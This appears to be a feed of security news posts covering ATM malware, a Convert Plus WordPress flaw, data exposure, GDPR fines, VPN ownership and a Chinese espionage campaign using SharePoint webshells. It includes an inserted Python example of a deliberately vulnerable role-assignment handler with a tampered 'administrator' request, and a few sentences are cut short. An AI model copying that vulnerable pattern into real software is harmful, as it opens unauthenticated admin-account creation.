The term "fake news" has lost much of its meaning, but it describes a real and dangerous Internet trend. Because it's hard for many people to differentiate a real news site from a fraudulent one, they can be hoodwinked by fictitious news stories pretending to be real. The result is that otherwise reasonable people believe lies.

The trends fostering fake news are more general, though, and we need to start thinking about how it could affect different areas of our lives. In particular, I worry about how it will affect academia. In addition to fake news, I worry about fake research.

An example of this seems to have happened recently in the cryptography field. SIMON is a block cipher designed by the National Security Agency (NSA) and made public in 2013. It's a general design optimized for hardware implementation, with a variety of block sizes and key lengths. Academic cryptanalysts have been trying to break the cipher since then, with some pretty good results, although the NSA's specified parameters are still immune to attack. Last week, a paper appeared on the International Association for Cryptologic Research (IACR) ePrint archive purporting to demonstrate a much more effective break of SIMON, one that would affect actual implementations. The paper was sufficiently weird, the authors sufficiently unknown and the details of the attack sufficiently absent, that the editors took it down a few days later. No harm done in the end.

In recent years, there has been a push to speed up the process of disseminating research results. Instead of the laborious process of academic publication, researchers have turned to faster online publishing processes, preprint servers, and simply posting research results. The IACR ePrint archive is one of those alternatives. This has all sorts of benefits, but one of the casualties is the process of peer review. As flawed as that process is, it does help ensure the accuracy of results. (Of course, bad papers can still make it through the process. We're still dealing with the aftermath of a flawed, and now retracted, Lancet paper linking vaccines with autism.)

Like the news business, academic publishing is subject to abuse. We can only speculate the motivations of the three people who are listed as authors on the SIMON paper, but you can easily imagine better-executed and more nefarious scenarios. In a world of competitive research, one group might publish a fake result to throw other researchers off the trail. It might be a company trying to gain an advantage over a potential competitor, or even a country trying to gain an advantage over another country.

Reverting to a slower and more accurate system isn't the answer; the world is just moving too fast for that. We need to recognize that fictitious research results can now easily be injected into our academic publication system, and tune our skepticism meters accordingly.

This essay previously appeared on

10 years of virtual dynamite: A high-level retrospective of ATM malware

It has been 10 years since the discovery of Skimer, the first malware specifically designed to attack automated teller machines (ATMs). At the time, the learning curve for understanding its functionality was rather steep, and analysis required specific knowledge of a manufacturer’s ATM API functions and parameters, which were not publicly documented.

Before the discovery of Skimer, anti-malware researchers considered ATMs secure machines containing proprietary hardware, running non-standard operating systems, and implementing a number of advanced protection techniques designed to prevent attacks using malicious code. Researchers eventually discovered that the most popular ATM manufacturers use a standard Windows operating system and add on some auxiliary devices, such as a safe and card reader.

Over time, actors behind some of the newer ATM malware families such as GreenDispenser and Tyupkin realized that there is a generic Windows extension for Financial Services API (CEN/XFS) that can be used to make malware that runs independent of the underlying hardware platform, as long as the ATM manufacturer supports the framework. This malware can trick the machines into dispensing cash, regardless of whether the attacker has a legitimate bank card.

Over time, ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states. The significance of ATM malware stems from the fact that it can bring significant financial benefits to attackers and as a consequence cause a significant damage to targeted banks, financial institutions and end users.

Now that this type of malware has been around for more than 10 years, we wanted to round up the specific families we’ve seen during that time and attempt to find out if the different families share any code.


The post 10 years of virtual dynamite: A high-level retrospective of ATM malware appeared first on Cisco Blog.

7 proven ways to accelerate your ISO 27001 project

  1. Do your research

Ditch the jargon and learn how to implement an ISMS (information security management system) in nine steps with our free guide. We’ve also got a handy pocket guide – Nine Steps to Success – An ISO 27001 Implementation Overview – that explains (in layman’s terms) how to develop and deploy an ISMS.

  2. Read the Standard

ISO/IEC 27001:2013 sets out the basic elements of an ISMS. For your project to be a success, it’s important to get your head around the details and understand what the Standard is all about. This might take time, but you’ll be going in blind without such knowledge.

  3. Learn from the experts

We’re no strangers to ISO 27001: our directors pioneered the world’s first ISMS certification project and we’ve helped hundreds of organisations prepare for and achieve certification to ISO 27001, so we know a thing or two about what it takes to succeed!

Learn how to put theory into practice by attending one of our ISO 27001 training courses. Available in a variety of formats, all of our courses have been designed by experts and are delivered by experienced trainers.

  4. Ditch the spreadsheets

When it comes to risk assessments, spreadsheets simply won’t cut it; a ‘one size fits all’ approach can’t accurately identify all the threats and vulnerabilities that could affect your organisation.

Get it right first time with risk assessment software designed to guide you through the entire risk assessment process. vsRisk™ includes a list of built-in threats and vulnerabilities for guidance and provides a set of required, auditable reports.

  5. Don’t try to reinvent the wheel

It might be hard to believe, but even consultants use pre-formatted templates for implementation projects. Rather than starting from scratch, save time and money and keep your project on track with our ISO 27001 documentation toolkit. Packed with policy templates, guidance and project management tools, it has helped more than 3,000 organisations to date.

  6. Train your staff

Staff awareness training is critical to minimise errors and infractions caused by poorly informed employees. E-learning is quick, user-friendly, trackable and affordable, and because the results are automatically stored, you can pull them up whenever an auditor asks for them. Get your staff familiar with information security and ISO 27001 with our popular e-learning course.

  7. Phone a friend

If you need more support with your project, we offer a range of options, with live, online consultancy support, including our popular ISO 27001 implementation bundles, available for as little as £200 an hour. We also offer bespoke consultancy if you need more help.

Acquire all the knowledge you need to implement an ISMS with our ISO27001 Get A Little Help Package. This package consists of tried and trusted tools and resources that will help you simplify your ISMS project deliverables and achieve certification faster.

Save £653 when you purchase this bundle online!

Buy now >>

The post 7 proven ways to accelerate your ISO 27001 project appeared first on IT Governance Blog.

Episode 503 – GitHub Releases Several Security Tools To Help Developers

GitHub is continuing to expand their security offerings to help developers create the most secure applications possible. This episode talks about the latest new security tools from GitHub. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe to the Security In Five […]

The post Episode 503 – GitHub Releases Several Security Tools To Help Developers appeared first on Security In Five.

Convert Plus WordPress plugin flaw allows hackers to create Admin accounts

The WordPress plugin Convert Plus is affected by a critical flaw that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The WordPress plugin Convert Plus is affected by a critical vulnerability that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The vulnerability stems from a lack of filtering when processing a new user subscription via a form implemented by the Convert Plus plugin, which has more than 100,000 active installations.

Convert Plus aims at generating more subscribers and sales conversions using popups, header & footer bars, slide-in forms, sidebar widgets, in-line forms, and social buttons.

New subscribers can use a specific form that allows them to define the role they want; of course, administrator accounts are not among the options offered in the drop-down menu.

Experts at Defiant discovered that Convert Plus plugin includes an administrator role in a hidden field called “cp_set_user.” Experts pointed out that the value for this field could be supplied by the same HTTP request as the rest of the subscription entry, and users can modify it.

“However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user.” reads the analysis by the experts. “Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.”

It would be very easy for an attacker to submit a subscription form and modify the value of “cp_set_user” to “administrator” in order to create a new admin user.

“This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.” continues the analysis.

“Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address.”

The attack creates a new admin account with a randomized password, but this is not a problem for the attacker, who can use the standard password reset procedure to change the password too.

The vulnerability affects all versions of the Convert Plus plugin up to 3.4.2; administrators must update their install to version 3.4.3.

Defiant experts also published a video PoC for the exploitation of the issue.
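The root cause described above, a role read from the client-supplied hidden field instead of from the form’s saved settings, can be shown beside the hardened handling. This is an added illustration and not the plugin’s code: the function name cp_add_new_user_role and the field name cp_set_user come from the analysis quoted above, while the form id, the roles allowlist and the in-memory stores are constructed for the example.

```python
"""Vulnerable and hardened handling of a subscription form's user role.

Not Convert Plus code; a model of the flaw the analysis describes.
"""

# Roles a lead-generation form may ever assign (assumption for the example:
# only non-privileged, subscriber-level roles).
ALLOWED_SUBSCRIPTION_ROLES = {"subscriber", "contributor"}

# Stand-in for the plugin's saved form settings in the database. The form
# owner configured the role here; the request must not be able to override it.
FORM_SETTINGS = {"form_42": {"cp_set_user": "subscriber"}}

users = []   # stand-in for the WordPress users table


def cp_add_new_user_role(email: str, role: str) -> dict:
    """Creates the account with the given role, as the analysis describes."""
    user = {"email": email, "role": role}
    users.append(user)
    return user


def vulnerable_subscribe(request: dict) -> dict:
    """The flawed pattern: the role is taken from the hidden cp_set_user field,
    which arrives in the same HTTP request as the rest of the entry and can
    therefore be changed by the submitter."""
    return cp_add_new_user_role(request["email"], request["cp_set_user"])


def fixed_subscribe(request: dict) -> dict:
    """Hardened pattern: ignore any role in the request, look up the role the
    form owner stored server-side, and refuse privileged roles outright."""
    form = FORM_SETTINGS.get(request["form_id"])
    if form is None:
        raise ValueError("unknown form")
    role = form["cp_set_user"]
    # Defence in depth: even a tampered or misconfigured setting can never
    # turn a public subscription form into an administrator factory.
    if role not in ALLOWED_SUBSCRIPTION_ROLES:
        raise PermissionError(f"role {role!r} may not be assigned by a subscription form")
    return cp_add_new_user_role(request["email"], role)


if __name__ == "__main__":
    # Constructed request with the hidden field altered, as in the write-up.
    req = {"form_id": "form_42", "email": "subscriber@example.com",
           "cp_set_user": "administrator"}
    print("vulnerable:", vulnerable_subscribe(req)["role"])
    print("fixed:", fixed_subscribe(req)["role"])
```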

Below the disclosure timeline of the vulnerability:

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Convert Plus plugin, hacking)

The post Convert Plus WordPress plugin flaw allows hackers to create Admin accounts appeared first on Security Affairs.

Report: 50% Increase in Exposed Data in One Year

New research released by digital risk protection specialists Digital Shadows has revealed a 50% increase in exposed data in the last year.

In its report Too Much Information: The Sequel from its Photon Research Team, Digital Shadows discovered that misconfiguration of commonly used file storage technologies was largely to blame for the exposure of 2.3 billion online files in one year. That is a jump of more than 750 million files since the same study was carried out by Digital Shadows in 2018.

Almost half of the files were exposed via the server message block protocol, whilst other technologies such as FTP services (20%), rsync (16%), Amazon S3 ‘buckets’ (8%) and network storage devices (3%) were also cited by Digital Shadows as sources of exposure.

Speaking to Infosecurity Harrison Van Riper, Photon Research analyst at Digital Shadows, said: “It is surprising to see such a large increase in such a short amount of time, indicating that the issue of inadvertent data exposure is not one to be taken lightly.”

However, it is not just the sheer amount of data exposed in the last 12 months, or even the means by which it was exposed, that causes concern: the sensitivity of the exposed data is also a significant issue. Digital Shadows warned that with exposed data including passport details, bank records, medical and business information, organizations and individual consumers are at greater risk of GDPR penalties, targeted business compromise, identity theft and ransomware attacks.

“Every day, there are new files being exposed that are potentially sensitive personal or private information for businesses and consumers alike,” Van Riper added. “Our research shows that in a GDPR world, the implications of inadvertently exposed data are even more significant. Countries within the European Union are collectively exposing over one billion files – nearly 50% of the total we looked at globally – some 262 million more than when we looked at last year. Some of the data exposure is inexcusable – Microsoft has not supported SMBv1 since 2014, yet many companies still use it. We urge all organizations to regularly audit the configuration of their public facing services.”

What Defines a Machine Learning-Based Threat Intelligence Platform?


As technology continues to evolve, several trends are staying consistent. First, the volume of data is growing exponentially. Second, human analysts can’t hope to keep up—there just aren’t enough of them and they can’t work fast enough. Third, adversarial attacks that target data are also on the rise.

Given these trends, it’s not surprising that an increasing number of tech companies are building or implementing tools that promise automation and tout machine learning and/or artificial intelligence, particularly in the realm of cybersecurity. In this day and age, stopping threats effectively is nearly impossible without some next-generation method of harnessing processing power to bear the burden of analysis. That’s where the concept of a cybersecurity platform built on threat intelligence comes in.

What is a platform?

When you bring together a number of elements in a way that makes the whole greater or more powerful than the sum of its parts, you have the beginnings of a platform. Think of it as an architectural basis for building something greater on top. If built properly, a good platform can support new elements that were never part of the original plan.

With so many layers continually building on top of and alongside one another, you can imagine that a platform needs to be incredibly solid and strong. It has to be able to sustain and reinforce itself so it can support each new piece that is built onto or out of it. Let’s go over some of the traits that a well-architected threat intelligence platform needs.

Scale and scalability

A strong platform needs to be able to scale to meet demand for future growth in users, products, and functionality. Its size and processing power need to be proportional to the usage needs. If a platform starts out too big too soon, it is too expensive to maintain. But if it is not big enough, it will not be able to handle the burden its users impose. That, in turn, affects the speed, performance, service availability, and overall user experience of the platform.

You also need to consider that usage fluctuates, not just over the years, but over different times of day. The platform needs to be robust enough to load balance accordingly, as users come online, go offline, increase and decrease demand, etc.

Modularity can’t be forgotten, either. When you encounter a new type of threat, or just want to add new functionality, you need to be able to plug that new capability into the platform without disrupting existing services. You don’t want to have to worry about rebuilding the whole thing each time you want to add or change a feature. The platform has to be structured in such a way that it will be able to support functionality you haven’t even thought of yet.

Sensing and connection

A threat intelligence platform is really only as good as its data sources. To accurately detect and even predict new security threats, a platform should be able to take data from a variety of sensors and products, then process it through machine learning analysis and threat intelligence engines.

Some of the more traditional sensors are passive “honeypots” (i.e. devices that appear open to attack, which collect and return threat telemetry when compromised). Unfortunately, attack methods are now so sophisticated that some can detect the difference between a honeypot and a real-world endpoint, and can adjust their behavior accordingly so as not to expose their methods to threat researchers. For accurate, actionable threat intelligence, the platform needs to gather real-world data from real-world endpoints in the wild.

One of the ways we, in particular, ensure the quality of the data in the Webroot® Platform, is by using each deployment of a Webroot product or service—across our home user, business, and security and network vendor bases—to feed threat telemetry back into the platform for analysis. That means each time a Webroot application is installed on some type of endpoint, or a threat intelligence partner integrates one of our services into a network or security solution, our platform gets stronger and smarter.

Context and analysis

One of the most important features a threat intelligence platform needs is largely invisible to end users: contextual analysis. A strong platform should have the capacity to analyze the relationships between numerous types of internet objects, such as files, apps, URLs, IPs, etc., and determine the level of risk they pose.

It’s no longer enough to determine if a given file is malicious or not. A sort of binary good/bad determination really only gives us a linear view. For example, if a bad file came from an otherwise benign domain that was hijacked temporarily, should we now consider that domain bad? What about all the URLs associated with it, and all the files they host?

For a more accurate picture, we need nuance. We must consider where the bad file came from, which websites or domains it’s associated with and for how long, which other files or applications it might be connected to, etc. It’s these connections that give us a three-dimensional picture of the threat landscape, and that’s what begins to enable predictive protection.
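What contextual analysis looks like in practice, as an added illustration that is not Webroot code and does not describe the Webroot Platform’s internals: a small reputation graph in which a file’s verdict is propagated to the domain it was downloaded from, weighted by the domain’s benign history, by how concentrated the malicious sightings are, and by how long ago they occurred. The domain names, the sightings and the thresholds (30-day window, 3-day burst, 7-day half-life, URLs inheriting half of their domain’s risk) are constructed assumptions for the example.

```python
"""Contextual risk scoring over a small reputation graph (added example).

A file verdict is not copied onto its domain; the domain's risk depends on
its benign history, how concentrated the malicious sightings are, and how
long ago they were seen. All thresholds below are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Sighting:
    obj: str        # object the verdict applies to, e.g. "file:<sha256>"
    context: str    # where it was seen, e.g. "domain:example.com"
    verdict: str    # "malicious" or "benign"
    seen: datetime


class ReputationGraph:
    """Edges run from an object with a verdict to the context it was observed in."""

    def __init__(self, now, window_days=30, burst_days=3, half_life_days=7):
        self.now = now
        self.window = timedelta(days=window_days)      # only look this far back
        self.burst = timedelta(days=burst_days)        # "short burst" of bad sightings
        self.half_life = timedelta(days=half_life_days)  # how fast old evidence fades
        self._by_context = defaultdict(list)

    def add(self, sighting):
        self._by_context[sighting.context].append(sighting)

    def assess(self, node):
        """Return (risk in [0, 1], label) for a context node such as a domain."""
        recent = [s for s in self._by_context.get(node, ())
                  if self.now - s.seen <= self.window]
        if not recent:
            return 0.0, "no-data"
        bad = sorted(s.seen for s in recent if s.verdict == "malicious")
        good = [s for s in recent if s.verdict == "benign"]
        if not bad:
            return 0.0, "benign"
        share = len(bad) / (len(bad) + len(good))      # fraction of sightings that were bad
        burst_span = bad[-1] - bad[0]                  # how concentrated the bad sightings are
        decay = 0.5 ** ((self.now - bad[-1]) / self.half_life)  # older evidence counts less
        if burst_span <= self.burst and len(good) >= len(bad):
            # a short malicious burst inside a mostly clean history looks like a
            # temporary hijack, so the risk fades as the burst recedes into the past
            return round(share * decay, 3), "likely-compromised"
        if share >= 0.5:
            return round(share, 3), "malicious"
        return round(share * decay, 3), "suspicious"

    def assess_url(self, url):
        """A URL with no sightings of its own inherits half of its domain's risk."""
        risk, label = self.assess(url)
        if label != "no-data":
            return risk, label
        host = url.split("://", 1)[-1].split("/", 1)[0]
        domain_risk, domain_label = self.assess("domain:" + host)
        return round(domain_risk * 0.5, 3), "inherited:" + domain_label


def build_sample_graph():
    """Constructed sightings (not real telemetry), assessed as of 31 May 2019."""
    g = ReputationGraph(now=datetime(2019, 5, 31))
    # example.com: ten benign downloads spread over May, three malicious ones on 10-11 May
    for day in range(1, 31, 3):
        g.add(Sighting(f"file:good{day}", "domain:example.com", "benign", datetime(2019, 5, day)))
    for day in (10, 11, 11):
        g.add(Sighting("file:bad0", "domain:example.com", "malicious", datetime(2019, 5, day)))
    # malicious.example: malicious files all month long, one benign sighting in between
    for day in (5, 12, 20, 29):
        g.add(Sighting("file:bad1", "domain:malicious.example", "malicious", datetime(2019, 5, day)))
    g.add(Sighting("file:good", "domain:malicious.example", "benign", datetime(2019, 5, 15)))
    return g


if __name__ == "__main__":
    graph = build_sample_graph()
    print("domain:example.com", graph.assess("domain:example.com"))
    print("domain:malicious.example", graph.assess("domain:malicious.example"))
    print("url:https://example.com/dl/a.exe", graph.assess_url("url:https://example.com/dl/a.exe"))
```

The burst test is the hijacked-domain case from the text: example.com ends up with a low, fading risk rather than a permanent blacklisting, while a domain that served malicious files all month is scored on its share of bad sightings alone. A URL with no telemetry of its own inherits a fraction of its domain’s risk, which answers the “what about all the URLs associated with it” question without pretending the graph knows more than it does.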

The Bottom Line

When faced with today’s cyberattacks, consumers and organizations alike need cybersecurity solutions that leverage accurate threat telemetry and real-time data from real endpoints and sensors. They need threat intelligence that is continually re-analyzed for the greatest accuracy, by machine learning models that are trained and retrained, which can process data millions of times faster than human analysts, and with the scalability to handle new threats as they emerge. The only way to achieve that is with a comprehensive, integrated machine-learning based platform.

The post What Defines a Machine Learning-Based Threat Intelligence Platform? appeared first on Webroot Blog.

Smashing Security #130: Doctored videos, BCC blunders, and a diva

You won’t believe who had to report themselves to the data protection agency for a breach, or who has been sharing doctored videos of political rivals, or how much money you can make selling a laptop infected with malware… and how Carole gets her diva on.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who aren’t joined by a guest this week.

Attackers are exploiting WordPress plugin flaw to inject malicious scripts

Attackers are leveraging an easily exploitable bug in the popular WP Live Chat Support plugin to inject malicious JavaScript into vulnerable sites, Zscaler warns. The company has discovered 47 affected sites (some have been cleaned up in the meantime), but that number is unlikely to be final. The source of the compromise The stored cross-site scripting vulnerability the attackers are exploiting was discovered by Sucuri researchers earlier this year and the plugin developers … More

The post Attackers are exploiting WordPress plugin flaw to inject malicious scripts appeared first on Help Net Security.

Checkers Says Data Breach Affected 100+ Locations

Checkers Drive-In Restaurants, Inc. revealed that a data breach possibly affected customers at more than 100 of its Checkers and Rally’s locations. Adam Noyes, chief administrative officer and executive vice president at Checkers Drive-In Restaurants, Inc., wrote in a statement that the double drive-thru restaurant chain recently learned of a malware infection involving some of […]… Read More

The post Checkers Says Data Breach Affected 100+ Locations appeared first on The State of Security.

Why Your Business Needs Mobile Device Management (MDM)


The number of privacy breaches that have hit the headlines has increased in recent years. Many of these incidents stem from lost devices or from lapses in mobile device security. As a result, IT managers need, more than ever, to find ways to manage these devices safely. Employees now expect to be able to bring their own devices (BYOD) to work, but BYOD remains a significant attack vector against the company. IT managers need to find ways to make personal devices easy to use while keeping both personal and business information secure.

A few years back, we never thought a day would come when employees would no longer have to rely on a desktop as the only means of doing their work. The wide acceptance of smartphones and mobile applications has freed employees from their desks and enabled them to do business outside the office.

From routine tasks to group chat and access to files in the cloud, working on a mobile device is no longer novel; it is the norm, business as usual. Although this approach is a productivity gain, there are real security risks when sensitive business information lives in an employee’s pocket. To manage that risk, many companies need a Mobile Device Management (MDM) system.

Put simply, MDM enables a company’s IT staff to manage and secure smartphones and tablets remotely. The benefits of MDM, however, are not restricted to monitoring mobile devices.

More control and security

An effective MDM system protects company data, e-mail, and confidential documents. If a device is lost or stolen, the administrator can remotely lock it, cut it off from company resources, or wipe it. Employees’ SIM cards can also be PIN-locked, so that anyone who moves the SIM to another device will need the PUK code.

MDM gives IT better control over devices. For example, a sales manager no longer has to register and configure every device used by the sales agents; devices can be enrolled and provisioned with the security software automatically. Specific tools and applications can also be pushed to agents’ devices. If you want an app configured at first start-up, or automatic application updates and replacements rolled out across the enterprise, you can do it centrally without needing physical access to the device.

Powerful and Highly Efficient Management

In practice, mobile devices can distract employees. If an organization wants to limit or prohibit certain apps on its devices and avoid unnecessary data costs, IT managers can block YouTube, Facebook, or other social media apps. Take, for example, a company’s emergency-response drivers: because they need to focus on the road, some companies use MDM to prevent them from using any app other than the transport app and Waze or Google Maps while driving. This ensures not only operational efficiency but also safety.

Increased flexibility

Working from a mobile device gives access to the relevant files anytime, anywhere and in any situation. Some tools give you that flexibility; for example, the company’s vendors do not need to download resources separately from different portals. A centralized MDM system enables more efficient distribution of business documents, such as training forms and learning materials, accessible only to authorized individuals.

Find the right MDM solution

As businesses focus on productivity, efficiency, and security, and as more and more companies adopt BYOD (bring your own device), MDM vendors are responding with features that help companies take control of devices while giving their employees freedom, security, and productivity.

Organizations can choose a device management provider based on their own requirements.


Insight Partners acquires Recorded Future for $780 million

Insight Partners has agreed to acquire a controlling interest in Recorded Future. The all-cash transaction values Recorded Future at more than $780 million and will accelerate the next phase of the company’s global growth and expansion. Today, Recorded Future is the largest privately-held threat intelligence software company in the world, with more than 400 clients and adding hundreds of new clients every year across all geographies and sectors onto its SaaS platform. The company has … More

The post Insight Partners acquires Recorded Future for $780 million appeared first on Help Net Security.

G Suite to get Gmail confidential mode, on by default

Earlier this year, Google introduced Gmail confidential mode for both consumer and G Suite users. While the former were able to use it immediately, the latter depended on whether their domain admin chose to enable it (as it was and is still in beta). But, starting on June 25, the feature will be turned on by default and it will be on admins to turn it off – if they don’t explicitly choose to disable … More

The post G Suite to get Gmail confidential mode, on by default appeared first on Help Net Security.

Fines Increase & Enforcements Fall in First Year of GDPR


Data protection monetary penalties have increased by £2m in the past year, while the number of enforcements issued fell by more than 20 from the number issued in 2017.

According to PwC’s 2018 Privacy & Security Enforcement Tracker, monetary penalties issued to UK organizations for breaching data protection laws in the calendar year 2018 totaled more than £6.5m, over £2m more than the previous year.

The data also showed that while the total sum of fines has increased, the number of enforcements issued fell to 67 in 2018, from 91 in 2017.

A year on from the GDPR compliance deadline, the data also showed that private sector companies accounted for 86% of the enforcements, though scrutiny remains on the public sector given the sensitive nature of the data it handles. A quarter (25%) of enforcement actions related to personal data security breaches.

Stewart Room, lead partner for GDPR and data protection at PwC, said that the trend of enforcement remained constant in comparison with previous years, with marketing and security infringements dominating the regulatory agenda.

“The absence of any GDPR fines in 2018 was not surprising, as it takes many months for cases to work through the system, but we know that they are on their way,” he said. “As well as looking at how to improve their levels of legal compliance, I would encourage organizations to focus on how good approaches to the handling of personal data can help them to deliver on their business purpose, to help and sustain the creation of long term value and trust.”

In an email to Infosecurity, Emma Loveday-Hill, senior associate and data protection specialist at Prettys, said that as monetary penalty notices in the last year were issued under the old legislation (the Data Protection Act 1998), where the maximum fine was £500,000, there were still numerous high level fines issued due to the fact that there were a number of serious breaches.

“In terms of the reduction in enforcement notices, this is likely to be due to the fact that the ICO has been busy dealing with the backlog of complaints and issues brought to their attention since the introduction of the GDPR and DPA 2018,” she said.

“Investigations by their very nature take time to carry out, and given the likely number of the complaints and issues raised with the ICO, this has no doubt had an impact on how quickly enforcement notices are handed down.

“Our message is still very much ‘watch this space’ as the ICO are just getting started in terms of what they are doing under the GDPR and Data Protection Act 2018, and going forward we are likely to see a higher number of enforcement notices and fines coming through over the coming months as the ICO makes its goal for 2019 a clear one: breaches of data protection law will be taken seriously and financial penalties will be issued as a result of noncompliance.”

VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs

Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

Recent research by the cybersecurity experts at VPNpro shows that the popular mobile VPN developer Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

The study also revealed that two of those VPN products are under its other developer name, Lemon Clove, and another two by Autumn Breeze 2018.

Interestingly, most of the popular mobile-only VPNs that VPNpro analyzed are actually Chinese (run by Chinese nationals or located in China). Any data held in mainland China is open to access by Chinese authorities, which bears out US senators’ recent concerns about American data falling into Chinese or Russian hands.

Innovative Connecting VPNs products

Innovative Connecting owns the following 10 VPN products:

  1. VPN Master – Free Proxy
  2. VPN Proxy Master (Pro)
  3. VPN Proxy Master (Lite)
  4. Turbo VPN
  5. Unlimited Free VPN
  6. HOT VPN
  7. Snap VPN
  8. VPN Robot
  9. VPN Sofast
  10. Turbo VPN Private Browser

Source: VPNpro

What is the relationship between Innovative Connecting, Lemon Clove and ALL Connected?

VPNpro’s research reveals a clear relationship between these three companies. Innovative Connecting has more than a strong business relationship with Lemon Clove, which publishes the popular Snap VPN and VPN Robot apps.

Lemon Clove and Innovative Connecting share the same company secretary, Loo Ping Yoo, and key addresses. The two companies’ websites are near-identical, differing only in small changes to the text.

If you search for VPN Proxy Master on Apple’s App Store, the developer name appears as ALL Connected, while Innovative Connecting is listed as the developer on Google Play.

ALL Connected’s Turbo and Master VPN apps are hosted on similar CloudFront domains that link to Innovative Connecting. The App Store privacy policy for VPN Master (developed by Innovative Connecting) is hosted on ALL Connected’s domain. All the policies for these VPN apps contain the same broken English and typos.

Innovative Connecting’s Director seems to be Danny Chen, the well-known Chinese entrepreneur and CEO behind Linksure. Beyond that, the researchers discovered that the email address used to register (developed by Innovative Connecting) also registered,, and many others.


Why does it matter if a company owns multiple VPN products?

There is nothing wrong with owning multiple VPN brands, but there must be transparency between the company and its users. Trust is the most important factor for most users of VPN services. Beyond this, there are two further crucial issues.

1. Privacy

In a recent US survey, 95% of internet users said they were either somewhat concerned or very concerned about their privacy. However, if VPNs are actually located in a 5/9/14 Eyes country, which are normally high-surveillance countries, or in a repressive country like China or Russia, users’ data is most likely already in those governments’ hands.

2. Security

If a VPN’s parent company is untrustworthy, including having weak security or actively engaged in malicious activities, it can be a big problem. This can lead to users’ data being stolen and sold on the black market, or even having their computers hacked into.

Bottom line

There are thousands of VPN companies out there, and unfortunately many of them have weak security and privacy features, or are outright malicious in wanting to steal or sell user data.

To help you find a trustworthy VPN, you should follow these steps below:

  • carefully read the privacy policy of a VPN provider
  • read in-depth reviews of a VPN company on different platforms
  • ask for recommendations in different communities and see their views
  • check if the company is GDPR compliant
  • review their privacy features
  • check if they have had any scandals or breaches

With the right homework, you can find a trustworthy VPN that actually helps safeguard your online activity.

About The Author: Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan’s inbox is open for new ideas and stories; you can share story ideas at susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(SecurityAffairs – VPNs, privacy)

The post VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs appeared first on Security Affairs.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010 and has targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.

The group has been involved in cyber espionage campaigns aimed at next-generation weapons programs and in surveillance of dissidents and other civilian groups.

The group uses both publicly available tools and custom malware in its operations; many of these tools have existed for years, but their code has been updated in recent attacks.

In April 2019, the group targeted organizations in two different countries in the Middle East. The attackers installed webshells on SharePoint servers by exploiting the CVE-2019-0604 remote code execution vulnerability.

Once inside the network, the attackers upload a variety of tools to perform additional activities, including dumping credentials and locating and pivoting to additional systems on the network.

Experts pointed out that the attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the SMBv1 flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Centre for Cyber Security. The Saudi report suggests the threat actors are primarily targeting organizations within the kingdom. The Canadian report describes similar attacks aimed at delivering the China Chopper webshell to maintain persistence in the target networks.

“the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by Palo Alto Networks.

Between April 1 and April 16, Palo Alto Networks observed the threat actors using webshells to upload 24 unique executables to three SharePoint servers hosted by two different government organizations. The same tools were uploaded through all three webshells, suggesting the involvement of the same attacker.

The most recent activity involving the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang.” continues the report.

The researchers also uncovered additional sideloaded DLLs used in this campaign.

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.”
